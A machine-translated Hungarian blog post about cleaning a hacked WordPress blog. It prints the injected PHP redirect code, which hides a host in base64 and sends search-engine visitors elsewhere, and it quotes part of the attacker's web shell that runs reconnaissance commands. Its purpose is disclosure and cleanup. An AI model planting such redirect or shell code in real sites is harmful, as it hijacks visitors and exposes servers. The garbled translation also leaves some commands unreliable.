Vírusos blogoszféra ... de mi volt velem?

Az elmúlt hónapban, kaptam figyelmeztetést vírus blog Egyes látogatók. Kezdetben figyelmen kívül hagyta a figyelmeztetéseket, mert telepített egy nagyon jó víruskereső (Kaspersky AV 2009), És bár a blog hosszú idő, én soha nem kaptam egy vírus figyelmeztetés (.. láttam valamit gyanús korábban, hogy az első frissítés eltűnt. Végül ...).
Lassan kezdtek megjelenni a nagy eltérések látogatói forgalmatEzt követően a forgalom az utóbbi időben folyamatosan csökken, és kezdett egyre több ember, akik azt mondják, hogy stealthsettings.com van virused. Tegnap kaptam valakitől egy screenshot tenni, ha a víruskereső blokkolja a forgatókönyv -tól stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. Ez elég meggyőző számomra, hogy az összes forrásból keresni. Az első gondolat, hogy jutott eszembe volt, hogy frissítés a legfrissebb WordPress (2.5.1), de nem azelőtt, hogy törölné az összes fájlt a régi szkriptből WordPress és elkészíteni biztonsági adatbázis. Ez az eljárás nem működött, és valószínűleg hosszú időbe telt, mire rájöttem, hol van a hiba, ha nem árulta el. Eugen a vita egy kávé, talált link A Google és jó lenne látni.
A MyDigitalLife.info cikket tett közzé: “WordPress Feltörés: Helyezze vissza és javítsa ki a Google-t és a keresőmotort vagy a cookie-forgalmat nem irányítja át a Your-Needs.info, az AnyResults.Net, a Golden-Info.net és más illegális webhelyekre"Ez a végén a menet volt szükségem.
Arról van szó, a kihasználni de WordPress cookie-k alapján, Ami szerintem nagyon bonyolult, és tette a könyvet. Okos elég ahhoz, hogy a SQL Injection Adatbázis a blog, hogy hozzon létre egy láthatatlan felhasználó egy egyszerű rutin ellenőrzés Műszerfal->felhasználók, ellenőrizze a szerver könyvtárakat és fájlokat "írható" (hogy chmod 777), keresni és keresni kivégez fájlok a kiváltságokat a root felhasználó vagy csoport. Nem tudom, akik kihasználják a nevét, és látom, hogy van néhány cikket írt róla, annak ellenére, hogy sok blogot fertőzött, köztük Románia. Ok ... Megpróbálom, hogy megpróbálja elmagyarázni általánosságokat a vírus.

Mi az a vírus?

Először helyezze a forrás oldalon a blogok, linkek láthatatlan a látogatók, de látható és váltólapkás keresők, főleg a Google. Ily módon a át Page Rank az oldalak által megadott támadó. Másodszor egy másik kerül beillesztésre átirányítás kód URL látogató érkezik a Google, Live, Yahoo, ... vagy egy RSS-olvasót, és nem a helyszínen aprósütemény. egy víruskereső érzékeli a átirányítására Trojan-Clicker.HTML.

Tünetek:

Masszív visszaesés látogatói forgalmat, Különösen a blogok, ahol a legtöbb látogató a Google-tól.

Azonosítás: (itt bonyolódik a probléma azok számára, akik nem sokat tudnak a phpmyadmin, php és linux)

LA. FIGYELEM! Először egy biztonsági másolat adatbázisban!

1. Ellenőrizze a forrás fájlokat index.php, header.php, footer.php, A blog témája és nézd meg, van egy kód, amely titkosítást használ base64 vagy az „if ($ ser ==” 1? && sizeof ($ _ COOKIE) == 0) ”formátumot tartalmazza:

<?php
$seref=array(”google”,”msn”,”live”,”altavista”,
”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref)
if(strpos(strtolower
($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit;
}?>

... Vagy valami. Törölje ezt a kódot!

Kattints a képre ...

index kód

A fenti képernyőképen véletlenül kiválasztottam és " ". Ennek a kódnak meg kell maradnia.

2. Használat phpMyAdmin és megy az adatbázis tábla wp_usersAhol ellenőrizze, nincs felhasználónév létrehozott 00:00:00 0000-00-00 (Lehetséges elhelyezése user_login írni "WordPress”. Írja le a felhasználói azonosítót (ID mező), majd törölje.

Kattints a képre ...

hamis felhasználói

* A zöld vonal el kell távolítani, és a visszatartott az igazolványát. Abban az esetben, álmosVajon ID = 8 .

3. Menj a táblázat wp_usermeta, Hol található és törlés vonalak azonosító (ahol a terület user_id ID érték megjelenik törlése).

4. Táblázat wp_option, Ugrás active_plugins és mi bővítmény engedélyezve van gyanúsított. Ezt fel lehet használni, mint a vég _old.giff, _old.pngg, _old.jpeg, _new.php.giffstb. gazdag képkiterjesztések kombinációi a _old és _new.

SELECT * FROM wp_options WHERE option_name = 'active_plugins'

Törölje ezt a bővítményt, majd lépjen a blog -> Irányítópult -> Bővítmények oldalra, ahol deaktiválja és aktiválja az összes bővítményt.

Kattints a képre, hogy úgy tűnik, active_plugins vírus fájlt.

csatlakoztat

Kövesd az utat az FTP vagy SSH, megjelölt active_plugins és törölje a fájlt a szerverről.

5. Minden phpMyAdmin, táblázat wp_option, Keresse meg és törölje a sort tartalmazza: "rss_f541b3abd05e7962fcab37737f40fad8"És az"internal_links_cache ".
A internal_links_cache készült titkosított spam linkek jelennek meg a blog, és a Google Adsense kód, A hacker.

6. Javasoljuk, hogy jelszó megváltoztatása Blog és bejelentkezés távolítsa el az összes gyanús userele. Frissítsen a legújabb verzióra WordPress és állítsa be a blogot, hogy ne regisztráljon új felhasználókat. Nincs veszteség… lakatlanként is hozzászólhatnak.

A fentiekben megpróbáltam elmagyarázni egy kicsit, mit kell tennie ilyen helyzetben, hogy megtisztítsam a blogot ettől a vírustól. A probléma sokkal súlyosabb, mint amilyennek látszik, és még közel sem megoldott, mert használják őket biztonsági réseket A webszerver hosting, ami a blog.

Ennek első fokú biztonság, hozzáférési SSH, Hogy néhány ellenőrzést a szerveren, hogy ha azokat a fájlokat, mint a * _old * és * _new. * A befejezés.Giff,. jpeg,. pngg,. jpgg. Ezeket a fájlokat törölni kell. Ha átnevezi a fájlt, például. top_right_old.giff in top_right_old.phpLátjuk, hogy a fájl pontosan exploit kódot szervert.

Néhány hasznos utasítás a szerver ellenőrzéséhez, tisztításához és biztonságához. (SSH-n keresztül)

1.  cd / tmp és ellenőrizze, hogy vannak mappák, mint a tmpVFlma vagy más kombinációk is ugyanaz a neve, és törölje azt. Lásd a lenti képen, két ilyen mappák tőlem:

tmpserver

rm-rf foldername

2. Ellenőrizze és szüntesse meg (módosítsa chmod-ul) lehetőség szerint az attribútumokkal rendelkező mappákat chmod 777

talál minden írható files jelenlegi dir: Keresés. -Type f-perm-2-ls
megtalálni az összes írható könyvtárak a jelenlegi konyvtarban: Keresés. -Type d-perm-2-ls
megtalálja az összes írható könyvtárat és files jelenlegi dir: Keresés. -Perm-2-ls

3. Keresi a gyanús fájlokat a kiszolgálón.

find . -name "*_new.php*"
find . -name "*_old.php*"
find . -name "*.jpgg"
find . -name "*_giff"
find . -name "*_pngg"

4, FIGYELEM! A fájlok állították bit SUID si SGID. Ezek a fájlok végre a felhasználó jogosultságával (csoport) vagy gyökér, sem a felhasználó, aki végrehajtja a fájlt. Ezek a fájlok vezethet gyökér kompromisszum, ha biztonsági kérdéseket. Ha a fájlok SUID és SGID bit, végre "chmod 0 " be vagy távolítsa el a csomagot tartalmazó.

Exploit tartalmazza valahol a forrás ...:

if(!$safe_mode){
if($os_type == 'nix'){
$os .= execute('sysctl -n kern.ostype');
$os .= execute('sysctl -n kern.osrelease');
$os .= execute('sysctl -n kernel.ostype');
$os .= execute('sysctl -n kernel.osrelease');
if(empty($user)) $user = execute('id');
$aliases = array(
'' => '',
'find suid files'=>'find / -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'show opened ports'=>'netstat -an | grep -i listen',
);
}else{
$os_name .= execute('ver');
$user .= execute('echo %username%');
$aliases = array(
'' => '',
'show runing services' => 'net start',
'show process list' => 'tasklist'
);
}

Ily módon ... alapvetően találja megsértése a biztonság. Ports nyitott könyvtárak "írható" és csoportos végrehajtás kiváltságokat fájlok / root.

Vissza több ...

Egyes blogok fertőzött: www.blegoo.com, www.visurat.ro,

fulgerica.com, denisuca.com, www.ecostin.com,
www.razvanmatasel.ro,

blog.hrmarket.ro, www.nitza.ro,
motorcycles.motomag.ro,

emi.brainient.com, www.picsel.ro,

www.mihaidragan.ro/kindablog/,
krumel.seo-point.com, www.itex.ro/blog,
www.radiology.ro,

www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,

dragos.roua.ro, www.artistul.ro/blog/,

www.mirabilismedia.ro/blog, blog.einvest.ro
... A lista folytatódik ... sokat.

A Google keresőmotorjával ellenőrizheti, hogy egy blog fertőzött-e. másolás beillesztés:

oldal www.blegoo.com vásárolni

Jó éjszakát és jó munkát;) Hamarosan azt hiszem, hogy Eugen hírekkel érkezik, a prevezibil.imprevizibil.com oldalon.

BRB :)

FIGYELEM! A téma megváltoztatása WordPress vagy frissítsen erre WordPress 2.5.1, NEM megoldás a vírus megszabadulására.

Hogyan » figyelemre méltó » Vírusos blogoszféra ... de mi volt velem?

Szenvedélyes a technológiával kapcsolatban, szeretek tesztelni és oktatóanyagokat írni az operációs rendszerekről macOS, Linux, Windows, ról ről WordPress, WooCommerce és LEMP webszerverek konfigurálása (Linux, NGINX, MySQL és PHP). írok tovább StealthSettingsA .com 2006 óta, és néhány évvel később elkezdtem írni az iHowTo.Tips oktatóanyagokat és az ökoszisztéma eszközeiről szóló híreket Apple: iPhone, iPad, Apple Nézd, HomePod, iMac, MacBook, AirPod-ok és kiegészítők.

Írj hozzászólást